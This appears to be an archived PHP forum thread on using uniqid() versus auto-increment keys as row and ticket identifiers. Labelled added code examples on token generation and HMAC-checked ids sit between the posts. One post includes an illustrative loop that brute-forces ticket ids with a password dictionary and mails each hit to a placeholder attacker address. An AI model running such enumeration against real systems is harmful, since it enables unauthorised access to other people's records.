uniqid as a db unique row identifier

Does using uniqid seem a reasonable way of generating a unique row
identifier in a db table? It's *highly* unlikely that two ids are
going to be generated in the same microsecond, but if they are,
setting lcg as true should eliminate any problems I'd have thought.
Anyway, these are my thoughts, do people agree?
Jul 17 '05 #1
MrBoom:
Does using uniqid seem a reasonable way of generating a unique row
identifier in a db table? It's *highly* unlikely that two ids are
going to be generated in the same microsecond, but if they are,
setting lcg as true should eliminate any problems I'd have thought.
Anyway, these are my thoughts, do people agree?


Why would you want to do that when an auto-incrementing number is
*guaranteed* to be unique and is much simpler?

André Næss
Jul 17 '05 #2
André Næss wrote:

MrBoom:
Does using uniqid seem a reasonable way of generating a unique row
identifier in a db table? It's *highly* unlikely that two ids are
going to be generated in the same microsecond, but if they are,
setting lcg as true should eliminate any problems I'd have thought.
Anyway, these are my thoughts, do people agree?


Why would you want to do that when an auto-incrementing number is
*guaranteed* to be unique and is much simpler?


I've done this before when I wanted unique ids that couldn't be easily guessed
by potential hackers, or where I didn't want to give away the size of a
database.

http://domain.com/support.php?ticketid=10
http://domain.com/support.php?ticketid=11
http://domain.com/support.php?ticketid=12

tells the user they're dealing with a small-potatoes company.

http://domain.com/support.php?ticketid=092386926834
http://domain.com/support.php?ticketid=440265495743
http://domain.com/support.php?ticketid=215764896614

doesn't give them any idea how big the company/website is.

Regards,
Shawn
--
Shawn Wilson
sh***@glassgiant.com
http://www.glassgiant.com
Jul 17 '05 #3
Shawn Wilson:
André Næss wrote:

MrBoom:
> Does using uniqid seem a reasonable way of generating a unique row
> identifier in a db table? It's *highly* unlikely that two ids are
> going to be generated in the same microsecond, but if they are,
> setting lcg as true should eliminate any problems I'd have thought.
> Anyway, these are my thoughts, do people agree?


Why would you want to do that when an auto-incrementing number is
*guaranteed* to be unique and is much simpler?


I've done this before when I wanted unique ids that couldn't be easily
guessed by potential hackers, or where I didn't want to give away the size
of a database.


Then start the incrementing number at 1122342345365 :)

But in the end you should strive to find good keys. I'm currently working on
importing data from an external datasource into an existing webshop. If
both systems had actually used natural keys this wouldn't be hard, but due
to the current use of surrogate keys it's a real pain.

André Næss
Jul 17 '05 #4
André Næss wrote:

Shawn Wilson:
André Næss wrote:

MrBoom:

> Does using uniqid seem a reasonable way of generating a unique row
> identifier in a db table? It's *highly* unlikely that two ids are
> going to be generated in the same microsecond, but if they are,
> setting lcg as true should eliminate any problems I'd have thought.
> Anyway, these are my thoughts, do people agree?

Why would you want to do that when an auto-incrementing number is
*guaranteed* to be unique and is much simpler?
I've done this before when I wanted unique ids that couldn't be easily
guessed by potential hackers, or where I didn't want to give away the size
of a database.


Then start the incrementing number at 1122342345365 :)


Still gives away volume of tickets over time and makes ids guessable by
hackers. I'm not super-paranoid or anything, but I prefer to give people no
information by default, then give them just what they need, rather than give
them everything, then take away what's a security risk.

http://domain.com/support.php?ticketid=1122342345365
...a week goes by...
http://domain.com/support.php?ticketid=1122342345372

= 7 tickets per week

Or, if you were trying to read other people's tickets (or whatever else), you
could do something like this:

for ($i = 1122342345365; $i < 1122342345465; ++$i) {
    foreach ($arrDictionary as $word) {
        if (is_real_page("http://domain.com/support.php?ticketid=$i&password=$word")) {
            mail("ba****@badguy.com", "We're in", $i . " is a real ticket # with password $word");
        }
    }
}

This is obviously a simplistic example. Any decent system should have some kind
of reporting/blacklisting script set up for this kind of approach, but the point
is, if you're trying to get in it's a lot easier if you know the first step.
But in the end you should strive to find good keys. I'm currently working on
importing data from an external datasource into an existing webshop. If
both systems had actually used natural keys this wouldn't be hard, but due
to the current use of surrogate keys it's a real pain.


I would agree that if the key is unlikely to ever be presented to the user, then
the simpler the better. I just brought up the above examples as practical uses
for non-sequential unique ids.

Regards,
Shawn
--
Shawn Wilson
sh***@glassgiant.com
http://www.glassgiant.com
Jul 17 '05 #5
I don't know about MySQL, but in MS SQL the increment can be greater than 1.

If you have a situation where you need to display private info without the
visitor logging in, I would take the primary key from the database, append a
string of random characters, then pass it through md5() or sha1() and store
the resulting hash in another column.

What you get from uniqid() isn't unguessable, since it's based on the system
time. All a potential hacker has to do is scan through the particular time
range during which the id might have been generated.

User "Shawn Wilson" <sh***@glassgiant.com> wrote in message
news:40***************@glassgiant.com...
Jul 17 '05 #6
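As an added example (not code from the thread), the two points Chung Leong makes, written for PHP 7+: a prefix-less uniqid() is eight hex digits of seconds followed by five hex digits of microseconds, so it decodes back to a generation time, and the lcg/more_entropy suffix comes from PHP's combined linear congruential generator rather than a CSPRNG. The token function follows his key-plus-random-string-then-hash recipe with random_bytes() and sha256 standing in for md5()/sha1(); the table and column names in the SQL comments are assumed.

```php
<?php
// Added example, not from the thread. Requires PHP 7+ (random_bytes, scalar types).

// uniqid() with no prefix is sprintf("%08x%05x", seconds, microseconds); with
// more_entropy it is followed by a digit, a dot and eight digits taken from the
// combined LCG. Decode the leading 13 hex chars back to the clock reading they encode.
function uniqid_to_time(string $id): array
{
    if (!preg_match('/^([0-9a-f]{8})([0-9a-f]{5})/', $id, $m)) {
        throw new InvalidArgumentException("not a uniqid() value: $id");
    }
    $sec  = hexdec($m[1]);
    $usec = hexdec($m[2]);
    return ['sec' => $sec, 'usec' => $usec, 'utc' => gmdate('Y-m-d\TH:i:s\Z', $sec)];
}

// Chung's recipe: primary key + random string, hashed, stored in its own column.
// All of the unguessability comes from random_bytes(); the hash only fixes the
// length and keeps the raw key out of the token. sha256 stands in for md5()/sha1().
function make_access_token(int $ticketId): string
{
    $random = bin2hex(random_bytes(16));      // 128 bits from the OS CSPRNG
    return hash('sha256', $ticketId . ':' . $random);
}

$id = uniqid('', true);                       // e.g. "66a1c2f3a4b5c1.23456789"
$t  = uniqid_to_time($id);
printf("%s was generated at %s UTC (+%d us); the lcg suffix is not unguessable\n",
       $id, $t['utc'], $t['usec']);

$token = make_access_token(42);
// Store the token beside the row and look rows up by the token, never by an id
// taken from the URL (table/column names are assumed):
//   UPDATE tickets SET access_token = :token WHERE id = 42;
//   SELECT id, subject FROM tickets WHERE access_token = :token;
echo "access_token for ticket 42: $token\n";
```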
"Chung Leong" <ch***********@hotmail.com> wrote in message news:<FN********************@comcast.com>...
What you get from uniqid() isn't unguessable, since it's based on the system
time. All a potential hacker has to do is scan through the particular time
range during which the id might have been generated.


But surely setting lcg as true would make it unguessable?
Jul 17 '05 #7
Chung Leong wrote:

I don't know about MySQL, but in MS SQL the increment can be greater than 1.
Any size increment would be easy to spot by generating 2 or 3 requests in a
row (as in a ticket system).
If you have a situation where you need to display private info without the
visitor logging in, I would take the primary key from the database, append a
string of random characters, then pass it through md5() or sha1() and store
the resulting hash in another column.
Yes, that would be more secure. I'm not suggesting anyone ever use only
uniqid() in lieu of passwords. But if you just want a quick unique id to
prevent giving away information _easily_, I think it's a good choice. Use a
prefix, set lcg to true, and run it through md5() if it's very
private/important.
What you get from uniqid() isn't unguessable, since it's based on the system
time. All a potential hacker has to do is scan through the particular time
range during which the id might have been generated.


Assuming they were trying to get a particular request and you didn't use lcg,
yes. But it still requires that they expend a lot of time just to get the first
step (knowing the id). The problem I have with incremental primary keys as
user-visible identifiers is that they give hackers a (potentially) huge number
of starting points. In other words, they could try the 10 most common passwords
on 1000 tickets/accounts/whatever. And they'd be likely to get one or more
hits.

Regards,
Shawn
--
Shawn Wilson
sh***@glassgiant.com
http://www.glassgiant.com
Jul 17 '05 #8
Shawn Wilson <sh***@glassgiant.com> wrote in message news:<40****************@glassgiant.com>...
André Næss wrote:

Shawn Wilson:
André Næss wrote:
>
> MrBoom:
>
> > Does using uniqid seem a reasonable way of generating a unique row
> > identifier in a db table? It's *highly* unlikely that two ids are
> > going to be generated in the same microsecond, but if they are,
> > setting lcg as true should eliminate any problems I'd have thought.
> > Anyway, these are my thoughts, do people agree?
>
> Why would you want to do that when an auto-incrementing number is
> *guaranteed* to be unique and is much simpler?

I've done this before when I wanted unique ids that couldn't be easily
guessed by potential hackers, or where I didn't want to give away the size
of a database.


Then start the incrementing number at 1122342345365 :)


Still gives away volume of tickets over time and makes ids guessable by
hackers. I'm not super-paranoid or anything, but I prefer to give people no
information by default, then give them just what they need, rather than give
them everything, then take away what's a security risk.


IMHO, avoiding an auto_incremented key is a mess. You may instead
consider crypting the query string.
eg. $fake_ticket_id = substr(md5($real_ticket_id), 0, 5) .
dechex($real_ticket_id) . substr(md5($real_ticket_id), 5, 5);

In this case, we may get back $real_ticket_id from the
$fake_ticket_id and can also check the validity of the query string.

--
"Success = 10% sweat + 90% tears"
If you live in USA, please support John Edwards.
Email: rrjanbiah-at-Y!com
Jul 17 '05 #9
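An added example (not code from the thread) that re-types the scheme in the post above as encode/decode functions and sets a keyed variant beside it: as posted, the md5() pieces depend only on the id, so the validity check proves the string is well formed, not that the server issued it, whereas an HMAC under a server-side secret cannot be satisfied without the key. The secret value is a placeholder; PHP 7.1+ is assumed for the nullable return types.

```php
<?php
// Added example, not from the thread. Needs PHP 7.1+ (?int) and hash_equals().

// As posted: 5 hex chars of md5(id) + dechex(id) + 5 more hex chars of md5(id).
function encode_unkeyed(int $realId): string
{
    $h = md5((string)$realId);
    return substr($h, 0, 5) . dechex($realId) . substr($h, 5, 5);
}

// Recovers the id and rebuilds the string to "check validity" as the post describes.
// Nothing secret is involved, so this catches typos and casual tampering only;
// the md5 pieces can be recomputed by anyone who knows the id layout.
function decode_unkeyed(string $fakeId): ?int
{
    if (strlen($fakeId) < 11) {
        return null;
    }
    $hex = substr($fakeId, 5, -5);
    if ($hex === '' || !ctype_xdigit($hex)) {
        return null;
    }
    $realId = (int)hexdec($hex);
    return encode_unkeyed($realId) === $fakeId ? $realId : null;
}

// Keyed variant: same reversible shape, but the tag is HMAC-SHA256 over the id
// under a server-side secret, so only the server can produce a passing string.
function encode_keyed(int $realId, string $secret): string
{
    $tag = substr(hash_hmac('sha256', (string)$realId, $secret), 0, 16);
    return dechex($realId) . '-' . $tag;
}

function decode_keyed(string $fakeId, string $secret): ?int
{
    $parts = explode('-', $fakeId, 2);
    if (count($parts) !== 2 || $parts[0] === '' || !ctype_xdigit($parts[0])) {
        return null;
    }
    $realId = (int)hexdec($parts[0]);
    // hash_equals() compares in constant time, so a tag cannot be matched byte by byte.
    return hash_equals(encode_keyed($realId, $secret), $fakeId) ? $realId : null;
}

$secret = 'PLACEHOLDER-load-from-config-never-from-the-request';

$fake = encode_unkeyed(1234);
printf("unkeyed %s -> %s\n", $fake, var_export(decode_unkeyed($fake), true));
// A value with the wrong md5 pieces around a valid hex id is rejected:
printf("unkeyed tampered -> %s\n", var_export(decode_unkeyed('00000' . dechex(1234) . '00000'), true));

$keyed = encode_keyed(1234, $secret);
printf("keyed %s -> %s\n", $keyed, var_export(decode_keyed($keyed, $secret), true));
// The same string checked under a different secret is rejected:
printf("keyed wrong secret -> %s\n", var_export(decode_keyed($keyed, 'other-secret'), true));
```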
Don't know. The function is designed to guarantee uniqueness, not
randomness. For security purpose I prefer to use something that was
designed--and more importantly, was tested and analysed--with that in mind.

The primary key doesn't need to be random if you're not exposing it, that is
my point. If you need some kind of a random tracking string, then generate
one and stick it in the database.

User "MrBoom" <an************@hotmail.com> wrote in message
news:9b**************************@posting.google.com...
But surely setting lcg as true would make it unguessable?

Jul 17 '05 #10